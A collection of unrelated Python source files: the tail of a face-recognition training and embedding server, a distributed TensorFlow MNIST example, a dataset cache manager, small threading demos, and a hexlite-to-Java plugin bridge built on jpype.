svm_train_dataset = os.path.join(svm_current_groupid_basepath, style, 'face_embedding')
if not os.path.exists(svm_train_dataset):
continue
svn_train_pkl = os.path.join(svm_current_groupid_basepath, style, 'classifier_182.pkl')
args_list = ['TRAIN', svm_train_dataset, 'facenet_models/20170512-110547/20170512-110547.pb',
svn_train_pkl, '--batch_size', '1000']
generate_embedding_ifmissing(svm_train_dataset)
ret_val = classifer.train_svm_with_embedding(args_list)
message = "Failed"
if ret_val is None:
message = "Failed"
else:
if ret_val is "OK":
train_cost = round(time.time() - stime,2)
message = '-> Train cost {}s'.format(train_cost)
else:
message = ret_val
print('-> Train {} SVM cost {}s'.format(style, time.time() - stime))
if len(device_id) > 1 and len(current_groupid) > 1:
sendMessage2Group(device_id, current_groupid, message)
'''
elif EN_SOFTMAX is True and FACE_COUNT[style] > 0 and FACE_COUNT[style] % 20 == 0:
clean_droped_embedding(group_id)
print("training on embedding now ...")
if os.path.exists('faces/train_faces.exe'):
output = subprocess.check_output(['./faces/train_faces.exe', current_groupid, style])
# s = subprocess.Popen('python ./faces/train_faces.exe {} {}'.format(current_groupid, style), shell=True)
elif os.path.exists('faces/train_faces.pyc'):
output = subprocess.check_output(['python', 'faces/train_faces.pyc', current_groupid, style])
# s = subprocess.Popen('python ./faces/train_faces.pyc {} {}'.format(current_groupid, style), shell=True)
else:
output = subprocess.check_output(['python', 'faces/train_faces.py', current_groupid, style])
# s = subprocess.Popen('python ./faces/train_faces.py {} {}'.format(current_groupid, style), shell=True)
print(output)
# os.system("python faces/train_faces.py") # 两种外挂训练方式
## 用户手动label时,更新自动标注训练集
# labeled_img = {}
def updata_trainset(json):
print("legacy trainset ignored")
return
# 接收json格式数据
data = json
url = data.get('url')
person_id = data.get('person_id')
device_id = data.get('device_id')
face_id = data.get('face_id')
drop = data.get('drop')
if (url is None) or (person_id is None) or (device_id is None) or (face_id is None) or (drop is None):
return
with app.app_context():
if drop == 'true' or drop == 'True' or drop == True:
train_set = TrainSet.query.filter_by(url=url, device_id=device_id).all()
for t in train_set:
db.session.delete(t)
db.session.commit()
# labeled_img[person_id].remove(url)
else:
old_train_set = TrainSet.query.filter_by(url=url, device_id=device_id, is_or_isnot=True).first() # 一张图片对应的人是唯一的
if old_train_set and old_train_set.face_id != int(face_id):
# url中的face不是 xxx
old_train_set.is_or_isnot = False
db.session.add(old_train_set)
db.session.commit()
# url中的face是 xxx
new_train_set = TrainSet(url=url,
embed=old_train_set.embed,
is_or_isnot=True,
person_id=person_id,
device_id=device_id,
face_id=face_id,
)
db.session.add(new_train_set)
db.session.commit()
print(old_train_set)
print(new_train_set)
# 存储一个单独的字典文件保存手动label过的url
# if not labeled_img.has_key(person_id):
# labeled_img[person_id] = set([])
# labeled_img[person_id].add(url)
@app.route('/api/tablet/', methods=['POST'])
def sync_config():
cmd_type = request.args.get('type', '')
print(cmd_type)
if cmd_type is not None and len(cmd_type) > 1:
if cmd_type == 'group':
uuid = request.args.get('uuid', '')
group_id = request.args.get('group_id', '')
print(uuid)
print(group_id)
if uuid is not None and len(uuid) > 1:
print("uuid=%s got group event, going to reconnect mqtt" %(uuid))
#清空一下group_id,不然不会从服务器重新获取group_id
save_groupid_to_file('')
mqttc.reSubscribeGroup(uuid)
time.sleep(2)
return Response(json.dumps({"result":"ok"}), status=200, mimetype='application/json')
@app.errorhandler(404)
def not_found(error=None):
message = {
'status': 404,
'message': 'Not Found ' + request.url,
}
return make_response(json.dumps(message), 404)
# 测试上传
@app.route('/test/upload')
def upload_test():
return '''
<!doctype html>
<title>Upload new File</title>
<h1>Upload new File</h1>
<form method=post action=/api/images enctype=multipart/form-data>
<p><input type=file name=file>
<input type=submit value=Upload>
</form>
'''
def parse_arguments(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--report', dest='report', action='store_true')
parser.add_argument('--no-report', dest='report', action='store_false')
parser.set_defaults(report=True)
parser.add_argument('--port', type=int,
help='The port server listen on', default=5000)
parser.add_argument('--host', type=str,
help='The ip server listen on', default='0.0.0.0')
return parser.parse_args(argv)
def mqttDebugOnOff(MQTTDebugFlag):
global ENABLE_DEBUG_LOG_TO_GROUP
if MQTTDebugFlag is False or MQTTDebugFlag is True:
ENABLE_DEBUG_LOG_TO_GROUP = MQTTDebugFlag
def crons_start():
if not os.path.exists(UPLOAD_FOLDER):
os.makedirs(UPLOAD_FOLDER)
if not os.path.exists(os.path.join(BASEDIR, 'data', 'data.sqlite')):
db.create_all()
svm_face_dataset=None
svm_face_embedding=None
svm_tmp_dir=None
svm_face_testdataset=None
svm_stranger_testdataset=None
def init_fs():
global svm_face_dataset
global svm_face_embedding
global svm_tmp_dir
global svm_face_testdataset
global svm_stranger_testdataset
if not os.path.exists(UPLOAD_FOLDER):
os.makedirs(UPLOAD_FOLDER)
# if not os.path.exists(os.path.join(BASEDIR, 'data.sqlite')):
# db.create_all()
if not os.path.exists(os.path.join(BASEDIR, 'data', 'data.sqlite')):
if os.path.exists(os.path.join(BASEDIR, 'data_init')):
shutil.copyfile(os.path.join(BASEDIR, 'data_init'), os.path.join(BASEDIR, 'data', 'data.sqlite'))
if not os.path.exists(TMP_DIR_PATH):
os.makedirs(TMP_DIR_PATH)
if SVM_CLASSIFIER_ENABLED:
svm_face_dataset = os.path.join(BASEDIR, 'data', 'face_dataset')
svm_face_embedding = os.path.join(BASEDIR, 'data', 'face_embedding')
svm_tmp_dir = os.path.join(BASEDIR, 'data', 'faces', 'noname', 'person')
svm_face_testdataset = os.path.join(BASEDIR, 'data', 'face_testdataset')
svm_stranger_testdataset = os.path.join(BASEDIR, 'data', 'stranger_testdataset')
if not os.path.exists(svm_face_dataset):
os.mkdir(svm_face_dataset)
if not os.path.exists(svm_face_embedding):
os.mkdir(svm_face_embedding)
if not os.path.exists(svm_tmp_dir):
os.makedirs(svm_tmp_dir)
if not os.path.exists(svm_face_testdataset):
os.mkdir(svm_face_testdataset)
if not os.path.exists(svm_stranger_testdataset):
os.mkdir(svm_stranger_testdataset)
def init_mqtt_client():
#TODO: UUID when no eth0/wlan0
device_id = get_deviceid()
mqttc = MyMQTTClass(device_id + str(5000))
mqttc.initialize(updata_trainset, disposeAutoGroupFunc)
mqttc.registerUpateTrainsetHandle(updateDataSet)
mqttc.registerMQTTDebugOnOffHandle(mqttDebugOnOff)
mqttc.registerDropPersonHandle(dropPersonFunc)
mqttc.registerMQTTFinalSyncDatasetsHandle(disposeFinalSyncDatasetsThreadFunc)
mqttc.registerMQTTSyncStatusInfoHandle(disposeSyncStatusInfoThreadFunc)
mqttc.registerMQTTGenerateEmbeddingIfMissingHandle(generate_embedding_ifmissing)
mqttc.start()
def update_frame_db(camera_id=None, device_id=None, group_id=None, blury=None, img_path=None, img_style=None, accuracy=None, url=None, num_face=None, tracking_id=None, time_stamp=None, tracking_flag=None):
#uuid = db.Column(db.String(64))
#group_id = db.Column(db.String(64))
#blury = db.Column(db.Integer)
#img_path = db.Column(db.String(128))
#img_style = db.Column(db.String(64))
#accuracy = db.Column(db.Float)
#url = db.Column(db.String(128))
#num_face = db.Column(db.Integer)
#tracking_id = db.Column(db.String(64))
#device_id = db.Column(db.String(64))
#time_stamp = db.Column(db.Integer)
#tracking_flag = db.Column(db.String(64))
if img_path is None or group_id is None:
return
with app.app_context():
frame = Frame.query.filter_by(group_id=group_id, img_path=img_path).first()
if frame is None:
new_frame = Frame(camera_id=camera_id, group_id=group_id, blury=blury, img_path=img_path,
img_style=img_style, accuracy=accuracy, url=url, num_face=num_face,
tracking_id=tracking_id, device_id=device_id, time_stamp=time_stamp, tracking_flag=tracking_flag)
db.session.add(new_frame)
print("insert in db: {}".format(new_frame))
else:
if blury is not None:
frame.blury = blury
if img_style is not None:
frame.img_style = img_style
if accuracy is not None:
frame.accuracy = accuracy
if url is not None:
frame.url = url
if num_face is not None:
frame.num_face = num_face
if tracking_id is not None:
frame.tracking_id = tracking_id
if time_stamp is not None:
frame.time_stamp = time_stamp
if tracking_flag is not None:
frame.tracking_flag = tracking_flag
db.session.add(frame)
print("update db: {}".format(frame))
db.session.commit()
def getQueueName():
if os.environ is not None and 'WORKER_TYPE' in os.environ.keys():
return os.environ['WORKER_TYPE']
return ""
def featureCalculation2(imgpath):
embedding=None
if HAS_OPENCL == 'false':
with open(imgpath, "rb") as image_file:
encoded_string = base64.b64encode(image_file.read())
embedding = get_remote_embedding(encoded_string)
else:
embedding = FaceProcessing.FaceProcessingImageData2(imgpath)
return embedding
@worker_process_init.connect()
def setup(sender=None, **kwargs):
global mqttc
# setup
print('done initializing <<< ==== be called Per Fork/Process')
_type=getQueueName()
if _type == "embedding":
check_groupid_changed()
init_fs()
if HAS_OPENCL == 'true':
mod = FaceProcessing.init_embedding_processor()
print("start to warm up")
embedding = featureCalculation2(os.path.join(BASEDIR,"image","Mike_Alden_0001_tmp.png"))
print("warmed up")
#if embedding is not None:
# print("worker embedding ready")
init_mqtt_client()
return "detect"
class FaceDetectorTask(Task):
def __init__(self):
self._model = 'testing'
self._type = getQueueName()
print(">>> {}".format(self._type))
@deepeye.task
def extract_v2(image):
# print(">>> extract() {} ".format(image))
imgstring=image["base64data"]
imgpath=image["path"]
style=image["style"]
blury=image["blury"]
ts=image["ts"]
trackerid=image["trackerid"]
totalPeople=image["totalPeople"]
uuid = get_deviceid()
current_groupid = get_current_groupid()
if current_groupid is None:
return json.dumps({"embedding_path":"","error":"please join group"})
if HAS_OPENCL == 'false':
embedding = get_remote_embedding(imgstring)
else:
embedding = FaceProcessing.FaceProcessingBase64ImageData2(imgstring)
embedding_path=''
embedding_str=''
if embedding is not None:
if type(trackerid) is not str:
trackerid = str(trackerid)
embedding_str = save_embedding.convert_embedding_to_string(embedding)
return json.dumps({"embedding_str":embedding_str})
else:
return json.dumps({"error":"please check your configuration"})
deepeye.conf.task_routes = {
'upload_api-v2.extract_v2': {'queue': 'embedding'}
}
if __name__ == '__main__':
deepeye.start()
|
mnist.py | import argparse
import tensorflow as tf
from tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets
from tfmesos import cluster
from threading import Thread, RLock
parser = argparse.ArgumentParser()
parser.add_argument('-w', '--nworker', type=int, default=1)
parser.add_argument('-s', '--nserver', type=int, default=1)
parser.add_argument('-Gw', '--worker-gpus', type=int, default=0)
parser.add_argument('-C', '--containerizer_type', choices=["MESOS", "DOCKER"], type=lambda s: s.upper(), nargs='?')
parser.add_argument('-P', '--protocol', type=str)
args, cmd = parser.parse_known_args()
master = cmd[0] if cmd else None
nworker = args.nworker
nserver = args.nserver
extra_kw = {}
if args.containerizer_type:
extra_kw['containerizer_type'] = args.containerizer_type
if args.protocol:
extra_kw['protocol'] = args.protocol
jobs_def = [
{
"name": "ps",
"num": nserver
},
{
"name": "worker",
"num": nworker,
"gpus": args.worker_gpus,
},
]
_lock = RLock()
mnist = read_data_sets("MNIST_data/", one_hot=True)
with cluster(jobs_def, master=master, quiet=False, **extra_kw) as c:
graph = tf.Graph()
with graph.as_default():
with tf.device(tf.train.replica_device_setter(ps_tasks=nserver)):
W = tf.Variable(tf.zeros([784, 10]))
b = tf.Variable(tf.zeros([10]))
global_step = tf.Variable(0)
x = tf.placeholder(tf.float32, [None, 784])
y = tf.nn.softmax(tf.matmul(x, W) + b)
y_ = tf.placeholder(tf.float32, [None, 10])
cross_entropy = -tf.reduce_sum(y_*tf.log(y))
steps = []
for i in range(nworker):
with tf.device('/job:worker/task:%d' % i):
steps.append(tf.train.GradientDescentOptimizer(0.005).minimize(cross_entropy, global_step=global_step))
correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
init_op = tf.global_variables_initializer()
coord = tf.train.Coordinator()
def train(i):
with graph.as_default():
with tf.Session(c.targets['/job:worker/task:%d' % i]) as sess:
step = 0
while not coord.should_stop() and step < 10000:
with _lock:
batch_xs, batch_ys = mnist.train.next_batch(100)
_, step = sess.run([steps[i], global_step], feed_dict={x: batch_xs, y_: batch_ys})
coord.request_stop()
with tf.Session(c.targets['/job:worker/task:0']) as sess:
sess.run(init_op)
threads = [Thread(target=train, args=(i,)) for i in range(nworker)]
for t in threads:
t.start()
coord.join(threads)
print(sess.run(accuracy, feed_dict={x: mnist.test.images, y_: mnist.test.labels}))
|
databases_cache_mgr.py | from pickle_helper import reading_pkl
from sets import Set
import numpy as np
import threading
import time
import os
from relational_network_utilities import print_debug
from relational_network_utilities import time_string
class DatabasesCacheMgr(object):
instance = None
@classmethod
def get_instance(cls):
if cls.instance is None:
cls.instance = cls()
return cls.instance
def __init__(self):
self.reset()
def internal_add_path_key(self, path, key):
if path in self.path_keys_map:
self.path_keys_map[path].append(key)
else:
self.path_keys_map[path] = [key]
def remove_path_key(self, path):
path = path.rstrip('/')
if not path in self.path_keys_map:
return
print_debug('DatabasesCacheMgr: Clearing cache for path {}'.format(path))
for key in self.path_keys_map[path]:
if key in self.data_inputs_map:
del self.data_inputs_map[key]
del self.data_targets_map[key]
del self.path_keys_map[path]
def reset(self):
self.data_inputs_map = {}
self.data_targets_map = {}
self.async_databases = Set([])
self.path_keys_map = {}
def get_key(self, path, batch_size=1, objects_cnt=1, window=1, is_ignore_zero_inputs=False):
return 'Database path: {} - batch: {} - objs: {} - window: {} - zeros {}'.format(path, batch_size, objects_cnt, window, is_ignore_zero_inputs)
def get_data(self, path, batch_size=1, objects_cnt=1, window=1, is_ignore_zero_inputs=False):
path = path.rstrip('/')
key_view = self.get_key(path, batch_size, objects_cnt, window, is_ignore_zero_inputs)
key_base = self.get_key(path, 1, 1)
if key_view in self.data_inputs_map:
return self.data_inputs_map[key_view], self.data_targets_map[key_view]
if key_base in self.async_databases:
print_debug('\n\n\nDatabasesCacheMgr Warning: Another thread wanna access while loading async, Lets sleep at path\n\n\n' + path)
while key_base in self.async_databases:
time.sleep(3 * 60)
while key_base in self.async_databases: # For safety as we should protect this variable
time.sleep(3 * 60)
data_inputs = None
data_targets = None
if key_base in self.data_inputs_map:
data_inputs = self.data_inputs_map[key_base]
data_targets = self.data_targets_map[key_base]
else:
data_inputs, data_targets = self.internal_load_db_sync(path, key_base)
data_inputs_view, data_targets_view = self.get_data_view(data_inputs, data_targets, batch_size, objects_cnt, window, is_ignore_zero_inputs)
self.data_inputs_map[key_view] = data_inputs_view
self.data_targets_map[key_view] = data_targets_view
self.internal_add_path_key(path, key_base)
self.internal_add_path_key(path, key_view)
return data_inputs_view, data_targets_view
def load_data_async(self, path, batch_size=1, objects_cnt=1, window=1, is_ignore_zero_inputs=False):
path = path.rstrip('/')
key_view = self.get_key(path, batch_size, objects_cnt, window, is_ignore_zero_inputs)
key_base = self.get_key(path, 1, 1)
if key_base in self.data_inputs_map:
return
self.async_databases.add(key_base)
t = threading.Thread(target=self.internal_load_db_sync, args = (path, key_base))
t.daemon = True
t.start()
return key_view
def get_data_view(self, data_inputs, data_targets, batch_size, objects_cnt, window, is_ignore_zero_inputs):
if len(data_inputs) == 0:
raise NameError('DatabasesCacheMgr: Empty data!')
if len(data_inputs) % objects_cnt != 0:
raise NameError('DatabasesCacheMgr: can not reshape width {} to {}'.format(len(data_inputs), objects_cnt))
data_inputs_view = []
data_targets_view = []
pos = 0;
while pos < len(data_inputs):
batch_inputs = np.array([])
batch_targets = np.array([])
for batch_idx in range(batch_size):
if pos >= len(data_inputs):
break
group_inputs = np.array([])
# read persons * window (each person t steps consective) and rearrange
# build a group of consecutive vectors, e.g. 12 feature vector of players as scene representation
for obj_idx in range(objects_cnt):
person_inputs = np.array([])
for w in range(window):
if pos >= len(data_inputs):
raise NameError('DatabasesCacheMgr: Incomplete data, cur lenth={}'.format(len(data_inputs)))
input = data_inputs[pos]
target = data_targets[pos][0]
pos = pos+1
if person_inputs.size == 0:
person_inputs = input
else:
person_inputs = np.concatenate((person_inputs, input), axis=0)
if group_inputs.size == 0:
group_inputs = person_inputs
else:
group_inputs = np.concatenate((group_inputs, person_inputs), axis=2)
if group_inputs.size > 0:
if batch_inputs.size == 0:
batch_inputs = group_inputs
else:
batch_inputs = np.concatenate((batch_inputs, group_inputs), axis=0)
for w in range(window):
batch_targets = np.concatenate((batch_targets, np.array([target])))
data_inputs_view.append(batch_inputs)
data_targets_view.append(batch_targets)
return data_inputs_view, data_targets_view
def internal_load_db_sync(self, path, key_base):
start_time = time.time()
print_debug('Reading from pickle file {}'.format(path))
if not os.path.exists(path):
raise NameError('DatabasesCacheMgr: Pickle file does NOT exit at path {}'.format(path))
data_inputs, data_targets = reading_pkl(path)
self.data_inputs_map[key_base] = data_inputs
self.data_targets_map[key_base] = data_targets
self.internal_add_path_key(path, key_base)
if key_base in self.async_databases:
self.async_databases.remove(key_base)
print_debug("Total reading time took {} for {}".format(time_string(time.time() - start_time), path))
return data_inputs, data_targets
|
part3.py | import threading
import time
total = 4
def creates_item():
global total
for i in range(10):
time.sleep(2)
print(f'iteration {i}')
total += 1
print('iterations done')
def create_items_2():
global total
for i in range(7):
time.sleep(1)
print(f'iteration {i}')
total += 1
print('iterations done')
def limits_items():
global total
while True:
if total > 5:
print('Overloaded')
total -= 3
print('subtracted by 3')
else:
time.sleep(1)
print('waiting')
creates1 = threading.Thread(target=creates_item)
creates2 = threading.Thread(target=create_items_2)
limiter = threading.Thread(target=limits_items, daemon=True)
creates1.start()
creates2.start()
limiter.start()
creates1.join()
creates2.join()
# limiter.join()
print(f'Finish. Total iterations = {total}')
|
Agent.py | import sys
import os
import Labyrinth
import time
import threading
class Agent:
num = 0
x = 0
y = 0
labyrinth = None
callback = None
def __init__(self, x, y, labyrinth, callback):
self.num = time.time()*1000
self.x = x
self.y = y
self.labyrinth = labyrinth
self.callback = callback
print(str(self.num)+': Created new agent. Exploring...')
t = threading.Thread(target=self.explore)
t.start()
def explore(self):
self.callback()
if self.labyrinth.finished or self.labyrinth.isVisited(self.x, self.y):
sys.exit()
walkableSpots = []
if (self.labyrinth.isFinish(self.x, self.y)):
print(str(self.num)+': Agent found the exit at x: '+str(self.x)+', y: '+str(self.y))
self.labyrinth.finished = True
sys.exit()
self.labyrinth.visit(self.x, self.y)
print('{}: Visiting {} {}'.format(str(self.num), self.x, self.y))
if (self.labyrinth.isWalkable(self.x-1, self.y)):
walkableSpots.append({'x': self.x-1, 'y': self.y})
if (self.labyrinth.isWalkable(self.x, self.y-1)):
walkableSpots.append({'x': self.x, 'y': self.y-1})
if (self.labyrinth.isWalkable(self.x+1, self.y)):
walkableSpots.append({'x': self.x+1, 'y': self.y})
if (self.labyrinth.isWalkable(self.x, self.y+1)):
walkableSpots.append({'x': self.x, 'y': self.y+1})
if (len(walkableSpots)==1):
self.x = walkableSpots[0]['x']
self.y = walkableSpots[0]['y']
t = threading.Thread(target=self.explore)
t.start()
if (len(walkableSpots)>1):
for num, spot in enumerate(walkableSpots, start = 1):
agent = Agent(spot['x'], spot['y'], self.labyrinth, self.callback)
self.x = walkableSpots[0]['x']
self.y = walkableSpots[0]['y']
t = threading.Thread(target=self.explore)
t.start()
if (len(walkableSpots) == 0):
print(str(self.num)+': Dead end reached, dying...')
sys.exit()
|
javaapiplugin.py | import dlvhex
from dlvhex import ID
import hexlite
import atexit
import logging
import os
import re
import sys
import threading
import time
# this requires jpype to be installed and it requires a working Java runtime environment
import jpype
from jpype import java
from jpype.types import *
logging.info("starting JVM")
java_args = os.environ.get('HEXLITE_JAVA_ARGUMENTS', [])
if java_args != []:
java_args = java_args.split(' ')
jpype.startJVM(*java_args, convertStrings=False)
def logJavaExceptionWithStacktrace(ex):
logging.error("Java exception: %s", ex.toString())
st = ex.getStackTrace()
for ste in st:
logging.error("\t at %s", ste.toString())
#sb.append(ex.getClass().getName() + ": " + ex.getMessage() + "\n");
# this loads the hexlite-API-specific classes (from hexlite-java-plugin-api-XYZ.jar)
IPluginAtom = JClass("at.ac.tuwien.kr.hexlite.api.IPluginAtom")
ISolverContext = JClass("at.ac.tuwien.kr.hexlite.api.ISolverContext")
JStoreAtomException = JClass("at.ac.tuwien.kr.hexlite.api.ISolverContext.StoreAtomException")
IInterpretation = JClass("at.ac.tuwien.kr.hexlite.api.IInterpretation")
ISymbol = JClass("at.ac.tuwien.kr.hexlite.api.ISymbol")
class JavaPluginHolder:
def __init__(self, classname, jplugin):
self.classname = classname
self.jplugin = jplugin
loadedPlugins = []
def convertExtSourceProperties(jesp):
# convert only those parts that are implemented in hexlite
ret = dlvhex.ExtSourceProperties()
ret.setProvidesPartialAnswer(jesp.getProvidesPartialAnswer())
ret.setDoInputOutputLearning(jesp.getDoInputOutputLearning())
return ret
def convertInputArguments(jinputarguments):
def convertOne(t):
if t == IPluginAtom.InputType.PREDICATE:
return dlvhex.PREDICATE
elif t == IPluginAtom.InputType.CONSTANT:
return dlvhex.CONSTANT
elif t == IPluginAtom.InputType.TUPLE:
return dlvhex.TUPLE
else:
raise ValueError("unknown input argument type "+repr(t))
ret = tuple([ convertOne(t) for t in jinputarguments ])
#logging.debug("XXX converted jinputarguments %s to %s", jinputarguments, ret)
return ret
@jpype.JImplements(ISymbol)
class JavaSymbolImpl:
# a JavaSymbolImpl mainly holds a hid (hexlite.ID)
# (concretely at the moment it always holds a hexlite.clingobackend.ClingoID)
def __init__(self, hid=None):
assert(isinstance(hid,ID))
self.hid = hid
self.__valuecache = hid.value()
#logging.info("JavaSymbolImpl with hid %s %s", self.hid, self.__valuecache)
@jpype.JOverride
def negate(self):
#logging.info("want to negate %s", self.hid)
return JavaSymbolImpl(self.hid.negate())
@jpype.JOverride
def value(self):
#logging.info("value of %s", self.hid)
return self.hid.value()
@jpype.JOverride
def intValue(self):
#logging.info("intvalue of %s", self.hid)
return self.hid.intValue()
@jpype.JOverride
def isTrue(self):
#logging.info("isTrue of %s", self.hid)
return self.hid.isTrue()
@jpype.JOverride
def isFalse(self):
#logging.info("isFalse of %s", self.hid)
return self.hid.isFalse()
@jpype.JOverride
def isAssigned(self):
#logging.info("isAssigned of %s", self.hid)
return self.hid.isAssigned()
@jpype.JOverride
def tuple(self):
ret = java.util.ArrayList()
#logging.info("want to get tuple of %s", self.hid)
for e in self.hid.tuple():
ret.add(JavaSymbolImpl(e))
return ret
@jpype.JOverride
def extension(self):
#logging.info("creating hashset")
ret = java.util.HashSet()
#logging.info("filling hashset")
for e in self.hid.extension():
#logging.info("adding tuple %s from extension", e)
#ret.add(e)
tup = java.util.ArrayList()
for t in e:
#jsym = jpype.JObject(JavaSymbolImpl(t))
jsym = JavaSymbolImpl(t)
#logging.info("adding symbol %s %s as %s", t, t.__class__, repr(jsym))
tup.add(jsym)
#logging.info("adding tuple %s to result as %s", tup, repr(tup))
ret.add(tup)
#logging.info("returning %s %s", ret, ret.__class__)
return ret
@jpype.JOverride
def hashCode(self):
#logging.info("returning hash code for %s", self)
return int(hash(self.__valuecache) & 0x7FFFFFFF)
def __eq__(self, other):
#logging.info("__eq__ got called on %s vs repr(%s)", self.hid, repr(other))
if not isinstance(other, JavaSymbolImpl):
return False
return self.hid == other.hid
@jpype.JOverride
def equals(self, other):
# we could just write self == other, but let's make it explicit that we call above method
# reminder:
# in Java, == only compares memory locations, and content comparison is done with equals()
# in Python, == is the same as __eq__ and it may do whatever it wants
return self.__eq__(other)
def __str__(self):
#logging.info("__str__ of %s %s", self.hid, self.__valuecache)
return str(self.hid)
@jpype.JOverride
def toString(self):
#logging.info("toString of %s %s", self.hid, self.__valuecache)
return str(self.hid)
@jpype.JImplements(IInterpretation)
class JavaInterpretationImpl:
def __init__(self):
pass
@jpype.JOverride
def getTrueInputAtoms(self):
return self._adapt(dlvhex.getTrueInputAtoms())
@jpype.JOverride
def getInputAtoms(self):
return self._adapt(dlvhex.getInputAtoms())
def _adapt(self, items):
ret = java.util.HashSet()
# each atom from dlvhex.getInputAtoms() is converted
# from hexlite to a java ISymbol
for x in items:
#logging.warning("adapting %s", x)
ret.add(JObject(JavaSymbolImpl(x)))
return ret
@jpype.JImplements(IPluginAtom.IQuery)
class JavaQueryImpl:
def __init__(self, arguments):
self.jinputTuple = jpype.JClass("java.util.ArrayList")()
# each argument is converted from hexlite to a java ISymbol
# each argument is an ID or a tuple
# we follow the structure of the argument
for arg in arguments:
#logging.debug("argument is %s", repr(arg))
assert(isinstance(arg, (JavaSymbolImpl,ISymbol)))
self.jinputTuple.add(arg)
@jpype.JOverride
def getInterpretation(self):
return JavaInterpretationImpl()
@jpype.JOverride
def getInput(self):
return self.jinputTuple
rValidConstant = re.compile(r'^[a-z][a-z0-9A-Z_]+$')
@jpype.JImplements(ISolverContext)
class JavaSolverContextImpl:
def __init__(self):
pass
@jpype.JOverride
def storeOutputAtom(self, otuple):
# all the otuple elements are ISymbol s
#logging.info("jSC.storeOutputAtom %s", otuple)
try:
s = dlvhex.storeOutputAtom([ x.hid for x in otuple ])
except dlvhex.StoreAtomException as e:
raise JStoreAtomException(str(e))
r = JavaSymbolImpl(s)
ret = jpype.JObject(r, ISymbol)
#logging.info("jSC.storeOutputAtom %s returns %s with type %s", otuple, repr(ret), type(ret))
return ret
@jpype.JOverride
def getInstantiatedOutputAtoms(self):
ret = java.util.ArrayList()
for oa in dlvhex.getInstantiatedOutputAtoms():
ret.add(jpype.JObject(JavaSymbolImpl(oa), ISymbol))
#logging.info("jSC.getInstantiatedOutputAtoms returns %s", repr(ret))
return ret
@jpype.JOverride
def storeAtom(self, tuple_):
# all the tuple_ elements are ISymbol s
#logging.info("jSC.storeAtom %s", tuple_)
try:
s = dlvhex.storeAtom([ x.hid for x in tuple_ ])
except dlvhex.StoreAtomException as e:
raise JStoreAtomException(str(e))
r = JavaSymbolImpl(s)
ret = jpype.JObject(r, ISymbol)
#logging.info("jSC.storeAtom %s returns %s with type %s", tuple_, repr(ret), type(ret))
return ret
@jpype.JOverride
def storeConstant(self, s):
# convert to python string, otherwise various string operations done within hexlite will fail on the java strings
pythonstr = str(s)
if len(pythonstr) == 0 or (pythonstr[0] != '"' and pythonstr[-1] != '"' and not rValidConstant.match(pythonstr)):
raise ValueError("cannot storeConstant for term '{}' with is probably a string (use storeString)".format(pythonstr))
r = jpype.JObject(JavaSymbolImpl(dlvhex.storeConstant(pythonstr)), ISymbol)
#logging.info("storeConstant %s returns %s with type %s", s, repr(r), type(r))
return r
@jpype.JOverride
def storeString(self, s):
pythonstr = str(s)
r = jpype.JObject(JavaSymbolImpl(dlvhex.storeString(pythonstr)), ISymbol)
#logging.info("storeString %s returns %s with type %s", s, repr(r), type(r))
return r
@jpype.JOverride
def storeInteger(self, i):
return JavaSymbolImpl(dlvhex.storeInteger(s))
@jpype.JOverride
def learn(self, nogood):
logging.info("java learns nogood %s", nogood.toString())
dlvhex.learn([ x.hid for x in nogood ])
def convertArguments(pyArguments):
# all ID classes stay the same way
# all tuples become unfolded (only at the end of the list)
# this is necessary because we do not want Java to get either Tuple or ISymbol as arguments
if len(pyArguments) == 0:
return []
assert(all([ isinstance(a, ID) for a in pyArguments[:-1] ]))
assert(isinstance(pyArguments[-1], (ID, tuple)))
ret = [ JavaSymbolImpl(a) for a in pyArguments[:-1] ]
if isinstance(pyArguments[-1], ID):
# convert last element as one
ret.append( JavaSymbolImpl(pyArguments[-1]) )
else:
# extend list from converted list of parts of last element (variable length argument list)
ret.extend([ JavaSymbolImpl(a) for a in pyArguments[-1] ])
return ret
class JavaPluginCallWrapper:
def __init__(self, eatomname, pluginholder, pluginatom):
self.eatomname = eatomname
self.pluginholder = pluginholder
self.pluginatom = pluginatom
def __call__(self, *arguments):
try:
logging.debug("executing java __call__ for %s with %d arguments", self.eatomname, len(arguments))
jsc = JavaSolverContextImpl()
jq = JavaQueryImpl(convertArguments(arguments))
#logging.info("executing retrieve")
janswer = self.pluginatom.retrieve(jsc, jq)
#logging.debug("retrieved")
tt = janswer.getTrueTuples()
#logging.info("true tuples")
if __debug__:
# sort for reproducable runs (java hashing is not stable across runs)
tt = sorted(tt, key=lambda t: t.toString())
for t in tt:
logging.debug("true tuple = %s %s", repr(t), t.toString())
for idx, elem in enumerate(t):
logging.debug(" idx %d = %s %s", idx, repr(elem), elem.toString())
assert(all([ isinstance(e, JavaSymbolImpl) for e in t ]))
tupleOfID = tuple([ e.hid for e in t ])
#logging.warning("retrieve created output %s for java output %s", tupleOfID, t.toString())
dlvhex.output(tupleOfID)
except jpype.JException as e:
logging.error("plugin call wrapper got Java exception %s %s", e, e.__class__)
logJavaExceptionWithStacktrace(e)
raise
except Exception as e:
logging.error("plugin call wrapper got exception that is not a JException %s %s", e, e.__class__)
raise
def register(arguments):
logging.info("Java API loaded with arguments %s", arguments)
global loadedPlugins
for classname in arguments:
logging.info("loading Java Plugin %s", classname)
try:
jclass = jpype.JClass(classname)
assert(jclass is not None)
logging.debug("instantiating Plugin")
jinst = jclass()
assert(jinst is not None)
jholder = JavaPluginHolder(classname, jinst)
assert(jholder is not None)
loadedPlugins.append(jholder)
logging.info("registering atoms of plugin %s with name %s", classname, jinst.getName())
for jpluginatom in jholder.jplugin.createAtoms():
pred = str(jpluginatom.getPredicate())
inputArguments = jpluginatom.getInputArguments()
outputArguments = jpluginatom.getOutputArguments()
jesp = jpluginatom.getExtSourceProperties()
prop = convertExtSourceProperties(jesp)
if pred in globals():
logging.error("trying to override '%s' in globals - duplicate external atom name or conflict with python internal names", pred)
else:
globals()[pred] = JavaPluginCallWrapper(pred, jholder, jpluginatom)
dlvhex.addAtom(pred, convertInputArguments(inputArguments), int(outputArguments), prop)
except JException as e:
logJavaExceptionWithStacktrace(e)
raise
logging.info("loaded %d Java plugins", len(loadedPlugins))
def teardown():
logging.info("teardown: destructing plugins")
global loadedPlugins
for p in loadedPlugins:
try:
logging.info("teardown on %s", p.classname)
if jpype.isJVMStarted():
p.jplugin.teardown()
else:
logging.info("no teardown - JVM not started")
